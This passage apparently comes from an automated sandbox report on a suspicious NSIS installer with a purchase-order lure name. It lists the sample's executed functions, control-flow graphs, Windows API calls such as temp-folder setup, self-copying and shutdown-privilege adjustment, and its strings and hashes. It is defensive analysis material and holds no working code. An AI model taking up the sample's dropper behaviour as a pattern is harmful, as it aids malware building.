16->21 49 Function_00407517 17->49 51 Function_00407598 17->51 61 Function_004074B2 17->61 19->3 19->11 27 Function_00405F6F 19->27 42 Function_0040600A 19->42 44 Function_0040608D 19->44 67 Function_004060BC 19->67 22 Function_00405AE5 22->23 23->31 39 Function_00406387 24->39 26 Function_0040136D 33 Function_0040647A 26->33 28 Function_00403AEF 58 Function_00405C26 28->58 63 Function_00403B34 28->63 29->9 29->25 46 Function_00405E94 29->46 29->54 29->56 29->65 30 Function_00404476 30->11 32 Function_00403F77 32->1 32->8 32->11 32->12 32->15 32->30 32->40 32->43 50 Function_00404498 32->50 32->54 59 Function_004044AB 32->59 34 Function_00405B7A 35 Function_0040557C 35->11 36 Function_0040307D 36->0 36->3 36->10 36->42 52 Function_00403019 36->52 36->54 60 Function_004034AC 36->60 62 Function_004032B4 36->62 36->65 37 Function_00405AFD 38 Function_00406306 39->38 40->26 64 Function_00401434 40->64 41 Function_0040350A 41->4 41->5 41->6 41->11 41->13 41->14 41->22 41->23 41->28 41->29 41->31 41->34 41->36 41->37 41->43 41->47 41->54 43->40 45 Function_00402F93 46->47 57 Function_00406923 52->57 55->11 55->12 55->20 55->33 56->3 56->18 56->47 58->9 58->14 58->16 58->25 58->29 58->35 58->54 58->58 58->65 60->44 62->0 62->2 62->35 62->60 62->67 63->53

                Executed Functions

                Function 0040350A Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450stringfilecomCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 40350a-40355a SetErrorMode GetVersionExW 1 403594-40359b 0->1 2 40355c-403590 GetVersionExW 0->2 3 4035a5-4035e5 1->3 4 40359d 1->4 2->1 5 4035e7-4035ef call 4068e7 3->5 6 4035f8 3->6 4->3 5->6 12 4035f1 5->12 8 4035fd-403611 call 406877 lstrlenA 6->8 13 403613-40362f call 4068e7 * 3 8->13 12->6 20 403640-4036a2 #17 OleInitialize SHGetFileInfoW call 40651a GetCommandLineW call 40651a 13->20 21 403631-403637 13->21 28 4036a4-4036a6 20->28 29 4036ab-4036be call 405e16 CharNextW 20->29 21->20 26 403639 21->26 26->20 28->29 32 4037b5-4037bb 29->32 33 4037c1 32->33 34 4036c3-4036c9 32->34 37 4037d5-4037ef GetTempPathW call 4034d9 33->37 35 4036d2-4036d8 34->35 36 4036cb-4036d0 34->36 39 4036da-4036de 35->39 40 4036df-4036e3 35->40 36->35 36->36 44 4037f1-40380f GetWindowsDirectoryW lstrcatW call 4034d9 37->44 45 403847-40385f DeleteFileW call 40307d 37->45 39->40 42 4037a3-4037b1 call 405e16 40->42 43 4036e9-4036ef 40->43 42->32 61 4037b3-4037b4 42->61 47 4036f1-4036f8 43->47 48 403709-403742 43->48 44->45 64 403811-403841 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034d9 44->64 66 403865-40386b 45->66 67 403a36-403a44 call 403aef OleUninitialize 45->67 54 4036fa-4036fd 47->54 55 4036ff 47->55 49 403744-403749 48->49 50 40375e-403798 48->50 49->50 56 40374b-403753 49->56 58 4037a0-4037a2 50->58 59 40379a-40379e 50->59 54->48 54->55 55->48 62 403755-403758 56->62 63 40375a 56->63 58->42 59->58 65 4037c3-4037d0 call 40651a 59->65 61->32 62->50 62->63 63->50 64->45 64->67 65->37 70 403871-403884 call 405e16 66->70 71 403912-403919 call 403bc9 66->71 77 403a46-403a55 call 405b7a ExitProcess 67->77 78 403a5b-403a61 67->78 84 4038d6-4038e3 70->84 85 403886-4038bb 70->85 80 40391e-403921 71->80 82 403a63-403a78 GetCurrentProcess OpenProcessToken 78->82 83 403ad9-403ae1 78->83 80->67 92 403aa9-403ab7 call 4068e7 82->92 93 403a7a-403aa3 LookupPrivilegeValueW AdjustTokenPrivileges 82->93 87 403ae3 83->87 88 403ae6-403ae9 ExitProcess 83->88 89 4038e5-4038f3 call 405ef1 84->89 90 403926-40393a call 405ae5 lstrcatW 84->90 86 4038bd-4038c1 85->86 94 4038c3-4038c8 86->94 95 4038ca-4038d2 86->95 87->88 89->67 105 4038f9-40390f call 40651a * 2 89->105 103 403947-403961 lstrcatW lstrcmpiW 90->103 104 40393c-403942 lstrcatW 90->104 106 403ac5-403ad0 ExitWindowsEx 92->106 107 403ab9-403ac3 92->107 93->92 94->95 99 4038d4 94->99 95->86 95->99 99->84 109 403a34 103->109 110 403967-40396a 103->110 104->103 105->71 106->83 108 403ad2-403ad4 call 40140b 106->108 107->106 107->108 108->83 109->67 113 403973 call 405ac8 110->113 114 40396c call 405a4b 110->114 121 403978-403988 SetCurrentDirectoryW 113->121 120 403971 114->120 120->121 123 403995-4039c1 call 40651a 121->123 124 40398a-403990 call 40651a 121->124 128 4039c6-4039e1 call 406557 DeleteFileW 123->128 124->123 131 403a21-403a2b 128->131 132 4039e3-4039f3 CopyFileW 128->132 131->128 134 403a2d-403a2f call 4062da 131->134 132->131 133 4039f5-403a0e call 4062da call 406557 call 405afd 132->133 141 403a13-403a15 133->141 134->109 141->131 142 403a17-403a1e CloseHandle 141->142 142->131
                APIs
                • SetErrorMode.KERNELBASE(00008001), ref: 0040352D
                • GetVersionExW.KERNEL32(?), ref: 00403556
                • GetVersionExW.KERNEL32(0000011C), ref: 0040356D
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
                • OleInitialize.OLE32(00000000), ref: 00403647
                • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
                • GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe",00000020,"C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe",00000000), ref: 004036B3
                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037E6
                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037F7
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403803
                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403817
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381F
                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403830
                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403838
                • DeleteFileW.KERNELBASE(1033), ref: 0040384C
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403933
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403942
                  • Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040394D
                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe",00000000,?), ref: 00403959
                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403979
                • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
                • CopyFileW.KERNEL32(C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,0079F708,00000001), ref: 004039EB
                • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000), ref: 00403A18
                • OleUninitialize.OLE32(?), ref: 00403A3B
                • ExitProcess.KERNEL32 ref: 00403A55
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
                • ExitProcess.KERNEL32 ref: 00403AE9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                • String ID: "C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized$C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas$C:\Users\user\Desktop$C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                • API String ID: 3859024572-2013704663
                • Opcode ID: d994e2c909d6b36eaefda8903238c4ace49fc37aa9f54e33e17b160914ad5137
                • Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
                • Opcode Fuzzy Hash: d994e2c909d6b36eaefda8903238c4ace49fc37aa9f54e33e17b160914ad5137
                • Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D
                Function 00405C26 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 391 405c26-405c4c call 405ef1 394 405c65-405c6c 391->394 395 405c4e-405c60 DeleteFileW 391->395 397 405c6e-405c70 394->397 398 405c7f-405c8f call 40651a 394->398 396 405de2-405de6 395->396 399 405d90-405d95 397->399 400 405c76-405c79 397->400 404 405c91-405c9c lstrcatW 398->404 405 405c9e-405c9f call 405e35 398->405 399->396 403 405d97-405d9a 399->403 400->398 400->399 406 405da4-405dac call 406850 403->406 407 405d9c-405da2 403->407 408 405ca4-405ca8 404->408 405->408 406->396 415 405dae-405dc2 call 405de9 call 405bde 406->415 407->396 411 405cb4-405cba lstrcatW 408->411 412 405caa-405cb2 408->412 414 405cbf-405cdb lstrlenW FindFirstFileW 411->414 412->411 412->414 416 405ce1-405ce9 414->416 417 405d85-405d89 414->417 431 405dc4-405dc7 415->431 432 405dda-405ddd call 40557c 415->432 421 405d09-405d1d call 40651a 416->421 422 405ceb-405cf3 416->422 417->399 420 405d8b 417->420 420->399 433 405d34-405d3f call 405bde 421->433 434 405d1f-405d27 421->434 425 405cf5-405cfd 422->425 426 405d68-405d78 FindNextFileW 422->426 425->421 427 405cff-405d07 425->427 426->416 430 405d7e-405d7f FindClose 426->430 427->421 427->426 430->417 431->407 435 405dc9-405dd8 call 40557c call 4062da 431->435 432->396 444 405d60-405d63 call 40557c 433->444 445 405d41-405d44 433->445 434->426 436 405d29-405d2d call 405c26 434->436 435->396 443 405d32 436->443 443->426 444->426 448 405d46-405d56 call 40557c call 4062da 445->448 449 405d58-405d5e 445->449 448->426 449->426
                APIs
                • DeleteFileW.KERNELBASE(?,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C4F
                • lstrcatW.KERNEL32(007A3F50,\*.*), ref: 00405C97
                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CBA
                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CC0
                • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CD0
                • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405D70
                • FindClose.KERNEL32(00000000), ref: 00405D7F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                • API String ID: 2035342205-314529707
                • Opcode ID: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                • Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
                • Opcode Fuzzy Hash: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                • Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E
                Function 00406850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 609 406850-406864 FindFirstFileW 610 406871 609->610 611 406866-40686f FindClose 609->611 612 406873-406874 610->612 611->612
                APIs
                • FindFirstFileW.KERNELBASE(?,007A4F98,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,00405F3A,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\), ref: 0040685B
                • FindClose.KERNEL32(00000000), ref: 00406867
                Strings
                • C:\Users\user\AppData\Local\Temp\nstDD9E.tmp, xrefs: 00406850
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID: C:\Users\user\AppData\Local\Temp\nstDD9E.tmp
                • API String ID: 2295610775-2038086183
                • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                • Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
                • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                • Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED
                Function 00403F77 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 143 403f77-403f89 144 4040f0-4040ff 143->144 145 403f8f-403f95 143->145 147 404101-404149 GetDlgItem * 2 call 404476 SetClassLongW call 40140b 144->147 148 40414e-404163 144->148 145->144 146 403f9b-403fa4 145->146 149 403fa6-403fb3 SetWindowPos 146->149 150 403fb9-403fc0 146->150 147->148 152 4041a3-4041a8 call 4044c2 148->152 153 404165-404168 148->153 149->150 155 403fc2-403fdc ShowWindow 150->155 156 404004-40400a 150->156 161 4041ad-4041c8 152->161 158 40416a-404175 call 401389 153->158 159 40419b-40419d 153->159 162 403fe2-403ff5 GetWindowLongW 155->162 163 4040dd-4040eb call 4044dd 155->163 164 404023-404026 156->164 165 40400c-40401e DestroyWindow 156->165 158->159 178 404177-404196 SendMessageW 158->178 159->152 160 404443 159->160 172 404445-40444c 160->172 169 4041d1-4041d7 161->169 170 4041ca-4041cc call 40140b 161->170 162->163 171 403ffb-403ffe ShowWindow 162->171 163->172 175 404028-404034 SetWindowLongW 164->175 176 404039-40403f 164->176 173 404420-404426 165->173 182 404401-40441a DestroyWindow EndDialog 169->182 183 4041dd-4041e8 169->183 170->169 171->156 173->160 181 404428-40442e 173->181 175->172 176->163 184 404045-404054 GetDlgItem 176->184 178->172 181->160 185 404430-404439 ShowWindow 181->185 182->173 183->182 186 4041ee-40423b call 406557 call 404476 * 3 GetDlgItem 183->186 187 404073-404076 184->187 188 404056-40406d SendMessageW IsWindowEnabled 184->188 185->160 215 404245-404281 ShowWindow KiUserCallbackDispatcher call 404498 EnableWindow 186->215 216 40423d-404242 186->216 189 404078-404079 187->189 190 40407b-40407e 187->190 188->160 188->187 192 4040a9-4040ae call 40444f 189->192 193 404080-404086 190->193 194 40408c-404091 190->194 192->163 196 4040c7-4040d7 SendMessageW 193->196 197 404088-40408a 193->197 194->196 198 404093-404099 194->198 196->163 197->192 201 4040b0-4040b9 call 40140b 198->201 202 40409b-4040a1 call 40140b 198->202 201->163 211 4040bb-4040c5 201->211 213 4040a7 202->213 211->213 213->192 219 404283-404284 215->219 220 404286 215->220 216->215 221 404288-4042b6 GetSystemMenu EnableMenuItem SendMessageW 219->221 220->221 222 4042b8-4042c9 SendMessageW 221->222 223 4042cb 221->223 224 4042d1-404310 call 4044ab call 403f58 call 40651a lstrlenW call 406557 SetWindowTextW call 401389 222->224 223->224 224->161 235 404316-404318 224->235 235->161 236 40431e-404322 235->236 237 404341-404355 DestroyWindow 236->237 238 404324-40432a 236->238 237->173 240 40435b-404388 CreateDialogParamW 237->240 238->160 239 404330-404336 238->239 239->161 241 40433c 239->241 240->173 242 40438e-4043e5 call 404476 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 240->242 241->160 242->160 247 4043e7-4043fa ShowWindow call 4044c2 242->247 249 4043ff 247->249 249->173
                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
                • ShowWindow.USER32(?), ref: 00403FD3
                • GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
                • ShowWindow.USER32(?,00000004), ref: 00403FFE
                • DestroyWindow.USER32 ref: 00404012
                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040402B
                • GetDlgItem.USER32(?,?), ref: 0040404A
                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
                • IsWindowEnabled.USER32(00000000), ref: 00404065
                • GetDlgItem.USER32(?,00000001), ref: 00404110
                • GetDlgItem.USER32(?,00000002), ref: 0040411A
                • SetClassLongW.USER32(?,000000F2,?), ref: 00404134
                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
                • GetDlgItem.USER32(?,00000003), ref: 0040422B
                • ShowWindow.USER32(00000000,?), ref: 0040424C
                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040425E
                • EnableWindow.USER32(?,?), ref: 00404279
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040428F
                • EnableMenuItem.USER32(00000000), ref: 00404296
                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
                • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
                • SetWindowTextW.USER32(?,007A1F48), ref: 004042FF
                • ShowWindow.USER32(?,0000000A), ref: 00404433
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                • String ID:
                • API String ID: 121052019-0
                • Opcode ID: 6aca1bad72cfddba572d633407a978d295c4fb80144ed58a8fa15c5a1abdb00b
                • Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
                • Opcode Fuzzy Hash: 6aca1bad72cfddba572d633407a978d295c4fb80144ed58a8fa15c5a1abdb00b
                • Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E
                Function 00403BC9 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 250 403bc9-403be1 call 4068e7 253 403be3-403bf3 call 406461 250->253 254 403bf5-403c2c call 4063e8 250->254 263 403c4f-403c78 call 403e9f call 405ef1 253->263 259 403c44-403c4a lstrcatW 254->259 260 403c2e-403c3f call 4063e8 254->260 259->263 260->259 268 403d0a-403d12 call 405ef1 263->268 269 403c7e-403c83 263->269 275 403d20-403d45 LoadImageW 268->275 276 403d14-403d1b call 406557 268->276 269->268 270 403c89-403cb1 call 4063e8 269->270 270->268 277 403cb3-403cb7 270->277 279 403dc6-403dce call 40140b 275->279 280 403d47-403d77 RegisterClassW 275->280 276->275 281 403cc9-403cd5 lstrlenW 277->281 282 403cb9-403cc6 call 405e16 277->282 293 403dd0-403dd3 279->293 294 403dd8-403de3 call 403e9f 279->294 283 403e95 280->283 284 403d7d-403dc1 SystemParametersInfoW CreateWindowExW 280->284 288 403cd7-403ce5 lstrcmpiW 281->288 289 403cfd-403d05 call 405de9 call 40651a 281->289 282->281 287 403e97-403e9e 283->287 284->279 288->289 292 403ce7-403cf1 GetFileAttributesW 288->292 289->268 297 403cf3-403cf5 292->297 298 403cf7-403cf8 call 405e35 292->298 293->287 303 403de9-403e03 ShowWindow call 406877 294->303 304 403e6c-403e74 call 40564f 294->304 297->289 297->298 298->289 311 403e05-403e0a call 406877 303->311 312 403e0f-403e21 GetClassInfoW 303->312 309 403e76-403e7c 304->309 310 403e8e-403e90 call 40140b 304->310 309->293 313 403e82-403e89 call 40140b 309->313 310->283 311->312 316 403e23-403e33 GetClassInfoW RegisterClassW 312->316 317 403e39-403e5c DialogBoxParamW call 40140b 312->317 313->293 316->317 321 403e61-403e6a call 403b19 317->321 321->287
                APIs
                  • Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                  • Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                • lstrcatW.KERNEL32(1033,007A1F48), ref: 00403C4A
